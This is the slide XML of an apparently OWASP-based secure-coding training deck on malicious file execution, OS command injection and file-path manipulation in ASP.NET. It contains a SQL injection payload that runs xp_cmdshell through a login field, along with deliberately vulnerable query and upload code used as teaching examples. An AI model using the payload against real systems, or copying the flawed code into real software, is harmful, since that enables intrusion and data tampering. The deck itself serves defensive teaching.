              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef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Validate the file name provided so that a directory path is not included.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef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Implement or enable sandbox or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>chroot</a:t>
            </a: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 controls which limit the applications access to files.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A3.	Malicious File Execution - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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72D395D-BEC7-403D-BCD2-209F76E3CD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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1417638"/>
            <a:ext cx="9144000" cy="533719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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HttpPostedFile myFile = fil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MyFile.PostedFile;</a:t>
            </a:r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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>byte[] myData = new byte[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myFile.ContentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>];</a:t>
            </a:r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	check for valid path and valid file extension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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>.StartsWith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(“C:\Temp”) == false)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{ return; }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//Read  from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filestream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myFile.InputStream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>FileStream newFile = new FileStream(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, FileMode.Create); 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Write data to the file 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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>newFile.Write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.Length);</a:t>
            </a:r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newFile.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/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9144000" cy="141763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C# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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ASP.Net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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141316" name="Slide Number Placeholder 3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0906F9-2A93-40BE-879C-0F6C2700D801}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141317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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top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0"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="95250" y="1066800"/>
            <a:ext cx="8763000" cy="2286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pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="3657600"/>
            <a:ext cx="8763000" cy="2286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pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973138" y="4657725"/>
            <a:ext cx="16764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60" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1350963" y="2835275"/>
            <a:ext cx="3175" cy="182245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61" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-318816">
            <a:off x="1811338" y="4506913"/>
            <a:ext cx="214312" cy="303212"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 56324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 flipV="1">
            <a:off x="1841500" y="45593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 flipV="1">
            <a:off x="1917700" y="45593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64" name="Rectangle 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="5400000">
            <a:off x="1692275" y="4737100"/>
            <a:ext cx="1447800" cy="349250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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19465" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2486025" y="4500563"/>
            <a:ext cx="592138" cy="233362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>
            <a:off x="2819400" y="4645025"/>
            <a:ext cx="3167063" cy="127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1" name="Freeform 70"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1447800" y="2816225"/>
            <a:ext cx="784225" cy="1708150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 111331 w 479"/>
              <a:gd name="T1" fmla="*/ 0 h 980"/>
              <a:gd name="T2" fmla="*/ 111331 w 479"/>
              <a:gd name="T3" fmla="*/ 1350833 h 980"/>
              <a:gd name="T4" fmla="*/ 784225 w 479"/>
              <a:gd name="T5" fmla="*/ 1708150 h 980"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 479"/>
              <a:gd name="T10" fmla="*/ 0 h 980"/>
              <a:gd name="T11" fmla="*/ 479 w 479"/>
              <a:gd name="T12" fmla="*/ 980 h 9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9" h="980">
                <a:moveTo>
                  <a:pt x="68" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="304"/>
                  <a:pt x="0" y="612"/>
                  <a:pt x="68" y="775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="938"/>
                  <a:pt x="393" y="937"/>
                  <a:pt x="479" y="980"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="59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19468" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="4087813"/>
            <a:ext cx="0" cy="5334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69" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4097338" y="4035425"/>
            <a:ext cx="596900" cy="4572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19470" name="Rectangle 73"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="3433763" y="4154488"/>
            <a:ext cx="1882775" cy="238125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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hardened OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19471" name="Rectangle 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="3411538" y="3859213"/>
            <a:ext cx="1882775" cy="238125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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19472" name="Rectangle 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="3411538" y="3568700"/>
            <a:ext cx="1882775" cy="238125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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>App Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19473" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4097338" y="3325813"/>
            <a:ext cx="592137" cy="152400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 flipH="1">
            <a:off x="4394200" y="2238375"/>
            <a:ext cx="3175" cy="114776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5" name="Rectangle 78"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="5400000">
            <a:off x="5376863" y="4713288"/>
            <a:ext cx="1447800" cy="349250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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19476" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6170613" y="4497387"/>
            <a:ext cx="592138" cy="233363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19477" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6491288" y="4652963"/>
            <a:ext cx="1585912" cy="15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8" name="Rectangle 81"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="6380162" y="2033588"/>
            <a:ext cx="1641475" cy="2286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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19479" name="Rectangle 82"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="6608762" y="2033588"/>
            <a:ext cx="1641475" cy="2286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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Legacy Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19480" name="Rectangle 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="6837362" y="2033588"/>
            <a:ext cx="1641475" cy="2286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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19481" name="Rectangle 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="-5400000">
            <a:off x="7065962" y="2033588"/>
            <a:ext cx="1641475" cy="2286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400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19482" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="3121025"/>
            <a:ext cx="0" cy="1539875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3" name="Rectangle 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="3352800" y="1901825"/>
            <a:ext cx="2174875" cy="425450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099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1400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Custom Developed Application Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19484" name="Picture 89" descr="TN_hacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="24000" contrast="42000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1425575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Freeform 90"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4476750" y="2268538"/>
            <a:ext cx="1435100" cy="2376487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 111400 w 876"/>
              <a:gd name="T1" fmla="*/ 0 h 1633"/>
              <a:gd name="T2" fmla="*/ 221163 w 876"/>
              <a:gd name="T3" fmla="*/ 2001023 h 1633"/>
              <a:gd name="T4" fmla="*/ 1435100 w 876"/>
              <a:gd name="T5" fmla="*/ 2257153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92" name="Freeform 91"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="2819400" y="2281238"/>
            <a:ext cx="1466850" cy="2363787"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 113865 w 876"/>
              <a:gd name="T1" fmla="*/ 0 h 1633"/>
              <a:gd name="T2" fmla="*/ 226056 w 876"/>
              <a:gd name="T3" fmla="*/ 1990329 h 1633"/>
              <a:gd name="T4" fmla="*/ 1466850 w 876"/>
              <a:gd name="T5" fmla="*/ 2245091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00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93" name="Freeform 92"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="6511925" y="3044825"/>
            <a:ext cx="1008063" cy="1574800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 78251 w 876"/>
              <a:gd name="T1" fmla="*/ 0 h 1633"/>
              <a:gd name="T2" fmla="*/ 155352 w 876"/>
              <a:gd name="T3" fmla="*/ 1325995 h 1633"/>
              <a:gd name="T4" fmla="*/ 1008063 w 876"/>
              <a:gd name="T5" fmla="*/ 1495722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19488" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="685800" y="226377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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APPLICATION</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19489" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-408781" y="4444206"/>
            <a:ext cx="14065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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19490" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-538956" y="2002632"/>
            <a:ext cx="16700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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19491" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="1089025"/>
            <a:ext cx="4038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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your security “perimeter” has huge holes at the application layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19492" name="TextBox 100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="153988" y="161925"/>
            <a:ext cx="8761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Is Your Application Code Secure? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19493" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="5880100"/>
            <a:ext cx="37306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latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ref. www.owasp.org/images/8/85/OWASP_Top_Ten.ppt </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19494" name="Slide Number Placeholder 3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5AAED7-DF3A-4D47-99A9-679000762EC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19495" name="Footer Placeholder 3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1" grpId="0" animBg="1"/>
      <p:bldP spid="92" grpId="0" animBg="1"/>
      <p:bldP spid="9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337192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Your software acts as a bridge between the internet user and internals of your operating system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If command string that accepts user input is used to invoke another program on the operating system, then you are inviting this attack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32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CWE-78: Failure to Preserve OS Command Structure (aka 'OS Command Injection') </a:t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CFA9FE-552A-48AC-92F7-0095A2AB8B2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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="928670"/>
            <a:ext cx="9144000" cy="54292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charset="0"/>
              </a:rPr>
              <a:t>ASP.NET – through MSSQL injection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charset="0"/>
              </a:rPr>
              <a:t>Query = “SELECT * FROM Users where Username = ‘” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’” and Password = ‘” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtPassword.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + “’”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charset="0"/>
              </a:rPr>
              <a:t>What if the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>txtUsername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is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’ or 1=1; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>master.dbo.xp_cmdshell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‘echo Hello World &gt; c:\output.txt’—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charset="0"/>
              </a:rPr>
              <a:t>Final Query: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SELECT * FROM Users where Username = ‘’ or 1=1; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> ‘echo Hello World &gt; c:\output.txt’—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9144000" cy="141763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/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1481138"/>
            <a:ext cx="9013825" cy="4525962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Input Validation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Quote arguments and escape any special characters within those arguments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Encoding output is important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811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CWE-78: Failure to Preserve OS Command Structure (aka 'OS Command Injection') - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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FAA98D-B994-4480-B5D7-37D7722F06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ontent Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1142984"/>
            <a:ext cx="9013825" cy="4864116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When you use an outsider’s input while constructing a filename, the resulting path could point outside of the intended directory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Allowing the attacker to manipulate the filename may cause application to execute a system program or external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1438"/>
            <a:ext cx="9144000" cy="1071546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111" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-73: External Control of File Name or Path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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A2B76E-A511-4503-BDE6-FC1BAF702F8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/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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1000108"/>
            <a:ext cx="9144000" cy="526575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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>HttpPostedFile myFile = fil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>MyFile.PostedFile;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300" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2300" dirty="0" smtClean="0"/>
              <a:t>byte[] myData = new byte[</a:t>
            </a:r>
            <a:r>
